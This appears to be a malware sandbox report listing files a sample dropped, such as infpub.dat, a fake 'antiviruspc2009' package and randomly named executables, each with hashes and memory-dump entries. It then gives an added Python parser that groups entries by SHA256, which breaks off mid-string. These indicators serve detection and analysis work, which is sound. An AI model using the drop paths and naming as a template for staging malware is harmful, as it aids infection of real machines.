SHA512 373f91981832cd9a1ff0b8744b43c7574b72971b5b6b19ea1f4665b6c878f7a1c7834ac08b92e0eca299eb4b590bf10f48a0485350a77a5f85fc3d2dd6913db3

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 fbbdc39af1139aebba4da004475e8839
SHA1 de5c8d858e6e41da715dca1c019df0bfb92d32c0
SHA256 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da
SHA512 74eca8c01de215b33d5ceea1fda3f3bef96b513f58a750dba04b0de36f7ef4f7846a6431d52879ca0d8641bfd504d4721a9a96fa2e18c6888fd67fa77686af87

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 b805db8f6a84475ef76b795b0d1ed6ae
SHA1 7711cb4873e58b7adcf2a2b047b090e78d10c75b
SHA256 f5d002bfe80b48386a6c99c41528931b7f5df736cd34094463c3f85dde0180bf
SHA512 62a2c329b43d186c4c602c5f63efc8d2657aa956f21184334263e4f6d0204d7c31f86bda6e85e65e3b99b891c1630d805b70997731c174f6081ecc367ccf9416

memory/592-82-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 910dd666c83efd3496f21f9f211cdc1f
SHA1 77cd736ee1697beda0ac65da24455ec566ba7440
SHA256 06effc4c15d371b5c40a84995a7bae75324b690af9fbe2e8980f8c0e0901bf45
SHA512 467d3b4d45a41b90c8e29c8c3d46ddfbdee9875606cd1c1b7652c2c7e26d60fedac54b24b75def125d450d8e811c75974260ba48a79496d2bdaf17d674eddb47

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 248aadd395ffa7ffb1670392a9398454
SHA1 c53c140bbdeb556fca33bc7f9b2e44e9061ea3e5
SHA256 51290129cccca38c6e3b4444d0dfb8d848c8f3fc2e5291fc0d219fd642530adc
SHA512 582b917864903252731c3d0dff536d7b1e44541ee866dc20e0341cbee5450f2f0ff4d82e1eee75f770e4dad9d8b9270ab5664ffedfe21d1ad2bd7fe6bc42cf0e

C:\Windows\infpub.dat

MD5 1d724f95c61f1055f0d02c2154bbccd3
SHA1 79116fe99f2b421c52ef64097f0f39b815b20907
SHA256 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648
SHA512 f2d7b018d1516df1c97cfff5507957c75c6d9bf8e2ce52ae0052706f4ec62f13eba6d7be17e6ad2b693fdd58e1fd091c37f17bd2b948cdcd9b95b4ad428c0113

memory/548-86-0x0000000000000000-mapping.dmp

memory/1752-72-0x0000000000000000-mapping.dmp

memory/964-97-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2028-100-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 04155ed507699b4e37532e8371192c0b
SHA1 a14107131237dbb0df750e74281c462a2ea61016
SHA256 b6371644b93b9d3b9b32b2f13f8265f9c23ddecc1e9c5a0291bbf98aa0fc3b77
SHA512 6de59ebbc9b96c8a19d530caa13aa8129531ebd14b3b6c6bbb758426b59ed5ab12483bfa232d853af2e661021231b4b3fcc6c53e187eeba38fa523f673115371

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 87ccd6f4ec0e6b706d65550f90b0e3c7
SHA1 213e6624bff6064c016b9cdc15d5365823c01f5f
SHA256 e79f164ccc75a5d5c032b4c5a96d6ad7604faffb28afe77bc29b9173fa3543e4
SHA512 a72403d462e2e2e181dbdabfcc02889f001387943571391befed491aaecba830b0869bdd4d82bca137bd4061bbbfb692871b1b4622c4a7d9f16792c60999c990

memory/1360-104-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 2eb3ce80b26345bd139f7378330b19c1
SHA1 10122bd8dd749e20c132d108d176794f140242b0
SHA256 8abed3ea04d52c42bdd6c9169c59212a7d8c649c12006b8278eda5aa91154cd2
SHA512 e3223cd07d59cd97893304a3632b3a66fd91635848160c33011c103cca2badbfe9b78fe258666b634e455872f3a98889ede5a425d8fae91cae6983da1ea1190a

memory/1268-107-0x0000000000000000-mapping.dmp

memory/1692-109-0x0000000000000000-mapping.dmp

memory/964-110-0x0000000000400000-0x0000000000A06000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 c7e9746b1b039b8bd1106bca3038c38f
SHA1 cb93ac887876bafe39c5f9aa64970d5e747fb191
SHA256 b1369bd254d96f7966047ad4be06103830136629590182d49e5cb8680529ebd4
SHA512 cf5d688f1aec8ec65c1cb91d367da9a96911640c695d5c2d023836ef11e374ff158c152b4b6207e8fcdb5ccf0eed79741e080f1cbc915fe0af3dacd624525724

memory/1868-111-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 d0deb2644c9435ea701e88537787ea6e
SHA1 866e47ecd80da89c4f56557659027a3aee897132
SHA256 ad6cd46f373aadad85fab5ecdb4cb4ad7ebd0cbe44c84db5d2a2ee1b54eb5ec3
SHA512 6faac2e1003290bb3a0613ee84d5c76d3c48a4524e97975e9174d6fcfb5a6a48d6648b06ed5a4c10c3349f70efffc6a08a185fdeb0824250ae044b96ef39fcdf

C:\Windows\302746537.exe

MD5 8703ff2e53c6fd3bc91294ef9204baca
SHA1 3dbb8f7f5dfe6b235486ab867a2844b1c2143733
SHA256 3028a2b0e95143a4caa9bcd6ae794958e7469a20c6e673da067958cbf4310035
SHA512 d5eb8a07457a78f9acd0f81d2f58bbf64b52183318b87c353a590cd2a3ac3a6ec9c1452bd52306c7cf99f19b6a897b16ceb8289a7d008c5ce3b07eda9b871204

memory/1752-118-0x0000000000220000-0x0000000000226000-memory.dmp

memory/1752-113-0x0000000000400000-0x0000000000438000-memory.dmp

memory/1116-119-0x00000000009C0000-0x00000000009C6000-memory.dmp

\Users\Admin\AppData\Local\6AdwCleaner.exe

MD5 87e4959fefec297ebbf42de79b5c88f6
SHA1 eba50d6b266b527025cd624003799bdda9a6bc86
SHA256 4f0033e811fe2497b38f0d45df958829d01933ebe7d331079eefc8e38fbeaa61
SHA512 232fedec0180e85560a226870a244a22f54ca130ed6d6dc95dc02a1ff85f17da396925c9ff27d522067a30ee3e74a38adff375d8752161ee629df14f39cf6ba9

memory/964-121-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/584-122-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

MD5 87e4959fefec297ebbf42de79b5c88f6
SHA1 eba50d6b266b527025cd624003799bdda9a6bc86
SHA256 4f0033e811fe2497b38f0d45df958829d01933ebe7d331079eefc8e38fbeaa61
SHA512 232fedec0180e85560a226870a244a22f54ca130ed6d6dc95dc02a1ff85f17da396925c9ff27d522067a30ee3e74a38adff375d8752161ee629df14f39cf6ba9

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

MD5 87e4959fefec297ebbf42de79b5c88f6
SHA1 eba50d6b266b527025cd624003799bdda9a6bc86
SHA256 4f0033e811fe2497b38f0d45df958829d01933ebe7d331079eefc8e38fbeaa61
SHA512 232fedec0180e85560a226870a244a22f54ca130ed6d6dc95dc02a1ff85f17da396925c9ff27d522067a30ee3e74a38adff375d8752161ee629df14f39cf6ba9

memory/1632-125-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 1f13396fa59d38ebe76ccc587ccb11bb
SHA1 867adb3076c0d335b9bfa64594ef37a7e2c951ff
SHA256 83ecb875f87150a88f4c3d496eb3cb5388cd8bafdff4879884ececdbd1896e1d
SHA512 82ca2c781bdaa6980f365d1eedb0af5ac5a80842f6edc28a23a5b9ea7b6feec5cd37d54bd08d9281c9ca534ed0047e1e234873b06c7d2b6fe23a7b88a4394fdc

memory/1624-128-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 63210f8f1dde6c40a7f3643ccf0ff313
SHA1 57edd72391d710d71bead504d44389d0462ccec9
SHA256 2aab13d49b60001de3aa47fb8f7251a973faa7f3c53a3840cdf5fd0b26e9a09f
SHA512 87a89e8ab85be150a783a9f8d41797cfa12f86fdccb48f2180c0498bfd2b1040b730dee4665fe2c83b98d436453680226051b7f1532e1c0e0cda0cf702e80a11

memory/1956-131-0x0000000000000000-mapping.dmp

memory/1588-132-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 e4d4a59494265949993e26dee7b077d1
SHA1 83e3d0c7e544117d6054e7d55932a7d2dbaf1163
SHA256 5ae57d8750822c203f5bf5e241c7132377b250df36a215dff2f396c8440b82dd
SHA512 efd176555415e0771a22a6ca6f15a82aec14ca090d2599959612db9d8e07065e38a7b82e2bf7be67cbe1494733344879782f5516bb502e0177e7b540c96fa718

memory/1624-136-0x0000000000400000-0x00000000005DE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 63210f8f1dde6c40a7f3643ccf0ff313
SHA1 57edd72391d710d71bead504d44389d0462ccec9
SHA256 2aab13d49b60001de3aa47fb8f7251a973faa7f3c53a3840cdf5fd0b26e9a09f
SHA512 87a89e8ab85be150a783a9f8d41797cfa12f86fdccb48f2180c0498bfd2b1040b730dee4665fe2c83b98d436453680226051b7f1532e1c0e0cda0cf702e80a11

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 e4d4a59494265949993e26dee7b077d1
SHA1 83e3d0c7e544117d6054e7d55932a7d2dbaf1163
SHA256 5ae57d8750822c203f5bf5e241c7132377b250df36a215dff2f396c8440b82dd
SHA512 efd176555415e0771a22a6ca6f15a82aec14ca090d2599959612db9d8e07065e38a7b82e2bf7be67cbe1494733344879782f5516bb502e0177e7b540c96fa718

memory/1496-138-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 af2379cc4d607a45ac44d62135fb7015
SHA1 39b6d40906c7f7f080e6befa93324dddadcbd9fa
SHA256 26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739
SHA512 69899c47d0b15f92980f79517384e83373242e045ca696c6e8f930ff6454219bf609e0d84c2f91d25dfd5ef3c28c9e099c4a3a918206e957be806a1c2e0d3e99

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 3ed3fb296a477156bc51aba43d825fc0
SHA1 9caa5c658b1a88fee149893d3a00b34a8bb8a1a6
SHA256 1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423
SHA512 dc3d6e409cee4d54f48d1a25912243d07e2f800578c8e0e348ce515a047ecf5fa3089b46284e0956bbced345957a000eecdc082e6f3060971759d70a14c1c97e

memory/1012-141-0x0000000000000000-mapping.dmp

memory/1484-144-0x0000000000460000-0x00000000004C8000-memory.dmp

memory/1116-147-0x00000000030C0000-0x00000000030D0000-memory.dmp

memory/1868-151-0x0000000000400000-0x0000000000410000-memory.dmp

memory/1624-152-0x00000000002B0000-0x000000000037E000-memory.dmp

memory/1624-153-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/1012-154-0x0000000000400000-0x0000000000439000-memory.dmp

memory/2000-155-0x0000000000180000-0x00000000001B1000-memory.dmp

memory/2000-157-0x0000000000400000-0x0000000000450000-memory.dmp

memory/1484-156-0x0000000000460000-0x00000000004C8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 0002dddba512e20c3f82aaab8bad8b4d
SHA1 493286b108822ba636cc0e53b8259e4f06ecf900
SHA256 2d68fe191ba9e97f57f07f7bd116e53800b983d267da99bf0a6e6624dd7e5cf7
SHA512 497954400ab463eb254abe895648c208a1cc951ecb231202362dadbe3ffb49d8d853b487589ce935c1dc8171f56d0df95093ffc655c684faa944c13bcfd87b8b

\Program Files (x86)\antiviruspc2009\avpc2009.exe

MD5 c18a7323332b3292a8e0f1c81df65698
SHA1 bcb8f34cbe0137e888d06acbcb6508417851a087
SHA256 9c42eca99e96a7402716fd865b57ea601fb9a18477fe2ab890bdbcd3052f68f8
SHA512 4d48d11f3d0a740b9193e17782c77b01f52dd6e8324755aa81188295a0caed0718d330453bb02ca8bc942ee5588928e57a0d89d90d6b1c32690338c5eae8e1ad

memory/980-161-0x0000000000000000-mapping.dmp

memory/1600-158-0x0000000000000000-mapping.dmp

memory/1688-163-0x0000000000000000-mapping.dmp

memory/320-165-0x0000000000000000-mapping.dmp

memory/584-164-0x0000000000350000-0x000000000037E000-memory.dmp

\Users\Admin\qiUYEYUk\vQkIcwYI.exe

MD5 72723b53808ffa17ef9478bfa115b39c
SHA1 f3e3084cb9a087436f441da608fed0ff64cdfa80
SHA256 e52853a3ee9e0c53a525f16cc178c81f6a615ba413225f039377287085190697
SHA512 185b37414c805db49eedb03b58023eabe65580f9c4ebb5666112c07a08fc0208a727373cbdc0d648b12a199d7a6c66fce1e1dafbd030ef1bb48a7a6ad9e5b0d1

\Program Files (x86)\antiviruspc2009\pthreadVC2.dll

MD5 0ab7d0e87f3843f8104b3670f5a9af62
SHA1 10c09a12e318f0fbebf70c4c42ad6ee31d9df2e5
SHA256 8aecab563b3c629e8f9dcd525dc2d6b1903f6c600637e63b1efe05e3c64d757b
SHA512 e08e17167edf461c0fca1e8b649c0c395793e80f5400f5cbb7d7906d0c99e955fcf6be2300db8663d413c4b3ffb075112a6ce5bf259553c0fd3d76200ee0d375

C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll

MD5 0ab7d0e87f3843f8104b3670f5a9af62
SHA1 10c09a12e318f0fbebf70c4c42ad6ee31d9df2e5
SHA256 8aecab563b3c629e8f9dcd525dc2d6b1903f6c600637e63b1efe05e3c64d757b
SHA512 e08e17167edf461c0fca1e8b649c0c395793e80f5400f5cbb7d7906d0c99e955fcf6be2300db8663d413c4b3ffb075112a6ce5bf259553c0fd3d76200ee0d375

\Program Files (x86)\antiviruspc2009\bzip2.dll

MD5 4143d4973e0f5a5180e114bdd868d4d2
SHA1 b47fd2cf9db0f37c04e4425085fb953cbce81478
SHA256 da25db24809479051d980be5e186926dd53233a76dfe357a455387646befca76
SHA512 e21827712a4870461921e7996506ffe456dd2303b69de370aa0499dde2e4747a73d8c0e8bd7d91c5bbc414ed5ee06f36d172237489494b3dd311ccd95ba07ebc

C:\Program Files (x86)\antiviruspc2009\bzip2.dll

MD5 4143d4973e0f5a5180e114bdd868d4d2
SHA1 b47fd2cf9db0f37c04e4425085fb953cbce81478
SHA256 da25db24809479051d980be5e186926dd53233a76dfe357a455387646befca76
SHA512 e21827712a4870461921e7996506ffe456dd2303b69de370aa0499dde2e4747a73d8c0e8bd7d91c5bbc414ed5ee06f36d172237489494b3dd311ccd95ba07ebc

\Program Files (x86)\antiviruspc2009\libltdl3.dll

MD5 00a71b4afda8033235432b1c433fecc7
SHA1 d7b0c218aa8fec1c60ada26a09d9e0d9601985ca
SHA256 f9c9d2b92efb80f6d11df52735b8bddd099847cc79ba56650793b21a0923b1cd
SHA512 96635e66d9781ad4d2414271f6a0904cf880ed94fc19186ef4da5f88f24e14ef1591fdc90e27db15a6021847c592688d0034f20e2e50ca93bf8c6db27e8c510a

C:\Program Files (x86)\antiviruspc2009\libltdl3.dll

MD5 00a71b4afda8033235432b1c433fecc7
SHA1 d7b0c218aa8fec1c60ada26a09d9e0d9601985ca
SHA256 f9c9d2b92efb80f6d11df52735b8bddd099847cc79ba56650793b21a0923b1cd
SHA512 96635e66d9781ad4d2414271f6a0904cf880ed94fc19186ef4da5f88f24e14ef1591fdc90e27db15a6021847c592688d0034f20e2e50ca93bf8c6db27e8c510a

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 02f471d1fefbdc07af5555dbfd6ea918
SHA1 2a8f93dd21628933de8bea4a9abc00dbb215df0b
SHA256 36619636d511fd4b77d3c1052067f5f2a514f7f31dfaa6b2e5677fbb61fd8cba
SHA512 287b57b5d318764b2e92ec387099e7e313ba404b73db64d21102ba8656636abbf52bb345328fe58084dc70414c9e2d8cd46abd5a463c6d771d9c3ba68759a559

C:\Program Files (x86)\antiviruspc2009\avpc2009.exe

MD5 c18a7323332b3292a8e0f1c81df65698
SHA1 bcb8f34cbe0137e888d06acbcb6508417851a087
SHA256 9c42eca99e96a7402716fd865b57ea601fb9a18477fe2ab890bdbcd3052f68f8
SHA512 4d48d11f3d0a740b9193e17782c77b01f52dd6e8324755aa81188295a0caed0718d330453bb02ca8bc942ee5588928e57a0d89d90d6b1c32690338c5eae8e1ad

memory/1692-176-0x0000000001000000-0x00000000010CE000-memory.dmp

memory/320-177-0x0000000000400000-0x0000000000CFB000-memory.dmp

memory/1012-178-0x0000000001C90000-0x0000000001CC2000-memory.dmp

C:\Users\Admin\qiUYEYUk\vQkIcwYI.exe

MD5 72723b53808ffa17ef9478bfa115b39c
SHA1 f3e3084cb9a087436f441da608fed0ff64cdfa80
SHA256 e52853a3ee9e0c53a525f16cc178c81f6a615ba413225f039377287085190697
SHA512 185b37414c805db49eedb03b58023eabe65580f9c4ebb5666112c07a08fc0208a727373cbdc0d648b12a199d7a6c66fce1e1dafbd030ef1bb48a7a6ad9e5b0d1

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 0315c3149c7dc1d865dc5a89043d870d
SHA1 f74546dda99891ca688416b1a61c9637b3794108
SHA256 90c2c3944fa8933eefc699cf590ed836086deb31ee56ec71b5651fd978a352c9
SHA512 7168dc244f0e400fa302801078e3faec8cdd2d3cb3b8baaab0a1b3c0929d7cf41e54bfbe530ad5ce96a6b63761f7866d26aaae788c3138c34294174091478112

memory/904-181-0x0000000000000000-mapping.dmp

\ProgramData\IIwkMYAg\wqccYwoU.exe

MD5 80ad3217c194a873f0ad7eaf40702b0b
SHA1 ebca8d01b9b7c947a3623a8736b7c9b8182d89a1
SHA256 1734a7cb28819bcd6bd6121e1eeadb53e109159ab82c0159e209c982364c6ff3
SHA512 cf1c090530438a9887d0444dccdb43359596e76bc93d5738983475870973940eef3e26a56234e3add9aae7cbd9472f79882c6ed1b4fad87357e87e4536bdd3ea

memory/288-179-0x0000000000000000-mapping.dmp

memory/1496-188-0x0000000000400000-0x000000000043F000-memory.dmp

memory/1464-187-0x0000000000000000-mapping.dmp

memory/1496-191-0x0000000000230000-0x0000000000242000-memory.dmp

memory/1864-190-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 e1b69c058131e1593eccd4fbcdbb72b2
SHA1 6d319439cac072547edd7cf2019855fa25092006
SHA256 b61c53f4137c41aa0a5538fc9a746034b3a903cc4b1b3c8b5f3d3118e1e2bd8f
SHA512 161a5923dc3a6507cbee3b547edcef4fbfe1dc6a04832c2472b1e635d758d1503a61361c2a83a13a0d8e4607516fda4ae6462a74df66b20a7c93174bbcc7129c

C:\ProgramData\IIwkMYAg\wqccYwoU.exe

MD5 80ad3217c194a873f0ad7eaf40702b0b
SHA1 ebca8d01b9b7c947a3623a8736b7c9b8182d89a1
SHA256 1734a7cb28819bcd6bd6121e1eeadb53e109159ab82c0159e209c982364c6ff3
SHA512 cf1c090530438a9887d0444dccdb43359596e76bc93d5738983475870973940eef3e26a56234e3add9aae7cbd9472f79882c6ed1b4fad87357e87e4536bdd3ea

memory/1012-194-0x0000000001C90000-0x0000000001CC2000-memory.dmp

memory/1496-197-0x0000000000400000-0x000000000043F000-memory.dmp

memory/1012-196-0x0000000001C90000-0x0000000001CBE000-memory.dmp

memory/904-195-0x0000000000400000-0x0000000000432000-memory.dmp

memory/472-185-0x0000000000000000-mapping.dmp

memory/1352-199-0x0000000000020000-0x00000000000A2000-memory.dmp

memory/548-198-0x00000000003A0000-0x0000000000592000-memory.dmp

memory/780-200-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 d0deb2644c9435ea701e88537787ea6e
SHA1 866e47ecd80da89c4f56557659027a3aee897132
SHA256 ad6cd46f373aadad85fab5ecdb4cb4ad7ebd0cbe44c84db5d2a2ee1b54eb5ec3
SHA512 6faac2e1003290bb3a0613ee84d5c76d3c48a4524e97975e9174d6fcfb5a6a48d6648b06ed5a4c10c3349f70efffc6a08a185fdeb0824250ae044b96ef39fcdf

memory/2036-202-0x0000000000000000-mapping.dmp

memory/960-201-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 d5e5853f5a2a5a7413f26c625c0e240b
SHA1 0ced68483e7f3742a963f2507937bb7089de3ffe
SHA256 415dd13c421a27ed96bf81579b112fbac05862405e9964e24ec8e9d4611d25f3
SHA512 49ea9ab92ce5832e702fac6f56a7f7168f60d8271419460ed27970c4a0400e996c2ea097636fc145e355c4df5cfbf200b7bf3c691133f72e4cad228f570b91e4

memory/2036-206-0x00000000013D0000-0x000000000150B000-memory.dmp

memory/1012-207-0x0000000001C90000-0x0000000001CBE000-memory.dmp

memory/1864-208-0x0000000000400000-0x000000000042E000-memory.dmp

memory/1496-209-0x0000000000400000-0x000000000043F000-memory.dmp

memory/2108-212-0x0000000000000000-mapping.dmp

C:\Windows\9DB7.tmp

MD5 347ac3b6b791054de3e5720a7144a977
SHA1 413eba3973a15c1a6429d9f170f3e8287f98c21c
SHA256 301b905eb98d8d6bb559c04bbda26628a942b2c4107c07a02e8f753bdcfe347c
SHA512 9a399916bc681964af1e1061bc0a8e2926307642557539ad587ce6f9b5ef93bdf1820fe5d7b5ffe5f0bb38e5b4dc6add213ba04048c0c7c264646375fcd01787

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 7dde6427dcf06d0c861693b96ad053a0
SHA1 086008ecfe06ad06f4c0eee2b13530897146ae01
SHA256 077c04ee44667c5e1024652a7bbe7fff81360ef128245ffd4cd843b7a56227cf
SHA512 8cf162f83ebfa2f3db54b10d5b0e6af590e97596ac2d469058a98340bf27de2866e679c777aa46dd530db44c27503d4cea8c34d96cb83b71477a806b5ab7c1b9

memory/2116-214-0x0000000000000000-mapping.dmp

memory/2060-210-0x0000000000000000-mapping.dmp

memory/2184-221-0x0000000000000000-mapping.dmp

memory/1496-222-0x0000000000400000-0x000000000043F000-memory.dmp

memory/1600-225-0x0000000000400000-0x0000000000415000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 0002dddba512e20c3f82aaab8bad8b4d
SHA1 493286b108822ba636cc0e53b8259e4f06ecf900
SHA256 2d68fe191ba9e97f57f07f7bd116e53800b983d267da99bf0a6e6624dd7e5cf7
SHA512 497954400ab463eb254abe895648c208a1cc951ecb231202362dadbe3ffb49d8d853b487589ce935c1dc8171f56d0df95093ffc655c684faa944c13bcfd87b8b

memory/2224-228-0x0000000000000000-mapping.dmp

memory/2252-230-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 8cd7c19b6dc76c116cdb84e369fd5d9a
SHA1 5e3ecd3e4ef8adc294db1e3525cdbde46b2b7ddc
SHA256 47769a82ac9994bf50fdb7ff521d2364775afea3da02d55450448a25e6f94645
SHA512 909d0a2ec4af33c374d7453926e5999badd2f9fa79d0648a7308f63911f673ae34ec275917999199e9fb3a669af5c4aa460e7639c5e346f261decd28b520039a

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 8cd7c19b6dc76c116cdb84e369fd5d9a
SHA1 5e3ecd3e4ef8adc294db1e3525cdbde46b2b7ddc
SHA256 47769a82ac9994bf50fdb7ff521d2364775afea3da02d55450448a25e6f94645
SHA512 909d0a2ec4af33c374d7453926e5999badd2f9fa79d0648a7308f63911f673ae34ec275917999199e9fb3a669af5c4aa460e7639c5e346f261decd28b520039a

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 03baeba6b4224371cca7fa6f95ae61c0
SHA1 8731202d2f954421a37b5c9e01d971131bd515f1
SHA256 61a9e3278b6bcc29a2a0405b06fb2a3bbcb1751c3dd564a8f94cc89ea957ec35
SHA512 386643b0a52b6b1a53e81a8500d040b6415e532ebaffd1be8d1afd4ccb10f6c0342cf734b688ec803b960339284c8d9669e638b1648d9cc734cf7367659c7fd0

memory/2176-220-0x0000000000000000-mapping.dmp

memory/2316-237-0x0000000000000000-mapping.dmp

memory/2340-239-0x0000000000000000-mapping.dmp

memory/1600-240-0x0000000000400000-0x0000000000415000-memory.dmp

memory/2252-241-0x0000000000400000-0x0000000000423000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 8803d517ac24b157431d8a462302b400
SHA1 b56afcad22e8cda4d0e2a98808b8e8c5a1059d4e
SHA256 418395efd269bc6534e02c92cb2c568631ada6e54bc55ade4e4a5986605ff786
SHA512 38fdfe0bc873e546b05a8680335526eec61ccc8cf3f37c60eee0bc83ec54570077f1dc1da26142488930eabcc21cb7a33c1b545a194cbfb4c87e430c4b2bfb50

memory/320-242-0x0000000000400000-0x0000000000CFB000-memory.dmp

memory/2284-235-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 e1b69c058131e1593eccd4fbcdbb72b2
SHA1 6d319439cac072547edd7cf2019855fa25092006
SHA256 b61c53f4137c41aa0a5538fc9a746034b3a903cc4b1b3c8b5f3d3118e1e2bd8f
SHA512 161a5923dc3a6507cbee3b547edcef4fbfe1dc6a04832c2472b1e635d758d1503a61361c2a83a13a0d8e4607516fda4ae6462a74df66b20a7c93174bbcc7129c

memory/2284-244-0x0000000000400000-0x0000000000432000-memory.dmp

memory/2116-245-0x0000000000400000-0x0000000000843000-memory.dmp

memory/1464-243-0x00000000004F0000-0x0000000000637000-memory.dmp

memory/1068-246-0x00000000010F0000-0x000000000112C000-memory.dmp

memory/2392-248-0x0000000000000000-mapping.dmp

memory/2380-249-0x0000000000000000-mapping.dmp

memory/2568-251-0x0000000000000000-mapping.dmp

memory/1012-253-0x0000000000400000-0x0000000000439000-memory.dmp

memory/2620-255-0x0000000000000000-mapping.dmp

memory/2612-256-0x0000000000000000-mapping.dmp

memory/2664-257-0x0000000000000000-mapping.dmp

memory/2580-254-0x0000000000000000-mapping.dmp

memory/2684-259-0x0000000000000000-mapping.dmp

memory/2676-258-0x0000000000000000-mapping.dmp

memory/2728-261-0x0000000000000000-mapping.dmp

memory/2736-262-0x0000000000000000-mapping.dmp

memory/2568-265-0x0000000000220000-0x0000000000223000-memory.dmp

memory/2184-264-0x0000000001D00000-0x0000000001D67000-memory.dmp

memory/780-269-0x0000000000120000-0x0000000000159000-memory.dmp

memory/2340-270-0x0000000010000000-0x0000000010010000-memory.dmp

memory/2252-274-0x0000000000240000-0x0000000000263000-memory.dmp

memory/2252-272-0x0000000000240000-0x0000000000263000-memory.dmp

memory/2116-277-0x0000000000850000-0x00000000008B0000-memory.dmp

memory/2252-276-0x0000000000240000-0x0000000000263000-memory.dmp

memory/2184-267-0x0000000000400000-0x000000000054F000-memory.dmp

memory/2568-266-0x0000000000400000-0x000000000044F000-memory.dmp

memory/2580-279-0x0000000001FE0000-0x0000000002012000-memory.dmp

memory/2796-282-0x0000000000000000-mapping.dmp

memory/2580-287-0x0000000002010000-0x0000000002042000-memory.dmp

memory/320-286-0x0000000000400000-0x0000000000CFB000-memory.dmp

memory/2864-281-0x0000000000000000-mapping.dmp

memory/2876-280-0x0000000000000000-mapping.dmp

memory/2852-278-0x0000000000000000-mapping.dmp

memory/780-289-0x0000000000120000-0x0000000000159000-memory.dmp

memory/2116-288-0x00000000034C0000-0x00000000034C3000-memory.dmp

memory/2864-290-0x0000000000400000-0x0000000000439000-memory.dmp

memory/3064-292-0x0000000000000000-mapping.dmp

memory/2260-293-0x0000000000000000-mapping.dmp

memory/320-294-0x0000000000400000-0x0000000000CFB000-memory.dmp

memory/2284-296-0x0000000000400000-0x0000000000432000-memory.dmp

memory/2376-295-0x0000000000000000-mapping.dmp

memory/964-297-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/584-299-0x000007FEFB591000-0x000007FEFB593000-memory.dmp

memory/1752-298-0x0000000000400000-0x0000000000438000-memory.dmp

memory/1868-300-0x0000000000400000-0x0000000000410000-memory.dmp

memory/1692-302-0x0000000001000000-0x00000000010CE000-memory.dmp

memory/2000-303-0x0000000000400000-0x0000000000450000-memory.dmp

memory/1624-301-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/320-304-0x0000000000400000-0x0000000000CFB000-memory.dmp

memory/2620-305-0x0000000000160000-0x0000000000192000-memory.dmp
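
The Files list above repeats the same binary under several path forms (with and without the drive letter, and once per write event), and an analyst usually wants one record per hash with every path it was seen at. The parser below is an added example, not part of the report or the sandbox's tooling; it reads the report's own layout (a path line followed by MD5/SHA1/SHA256/SHA512 lines, with memory-dump lines interleaved) and collapses it by SHA256, rejecting digests of the wrong length. REPORT_EXCERPT is a short excerpt copied from the list above.

```python
"""Collapse a sandbox report's dropped-file list into one record per SHA256.

Added example, not part of the report. Input is the report's own text layout:
a path line, a blank line, then MD5/SHA1/SHA256/SHA512 lines; "memory/..."
dump names are interleaved and ignored here.
"""
import re
from typing import Dict, List

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
HASH_LENGTHS = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

# Excerpt copied from the Files section above (same binary under two path forms).
REPORT_EXCERPT = r"""
\Program Files (x86)\antiviruspc2009\avpc2009.exe

MD5 c18a7323332b3292a8e0f1c81df65698
SHA1 bcb8f34cbe0137e888d06acbcb6508417851a087
SHA256 9c42eca99e96a7402716fd865b57ea601fb9a18477fe2ab890bdbcd3052f68f8
SHA512 4d48d11f3d0a740b9193e17782c77b01f52dd6e8324755aa81188295a0caed0718d330453bb02ca8bc942ee5588928e57a0d89d90d6b1c32690338c5eae8e1ad

memory/980-161-0x0000000000000000-mapping.dmp

C:\Program Files (x86)\antiviruspc2009\avpc2009.exe

MD5 c18a7323332b3292a8e0f1c81df65698
SHA1 bcb8f34cbe0137e888d06acbcb6508417851a087
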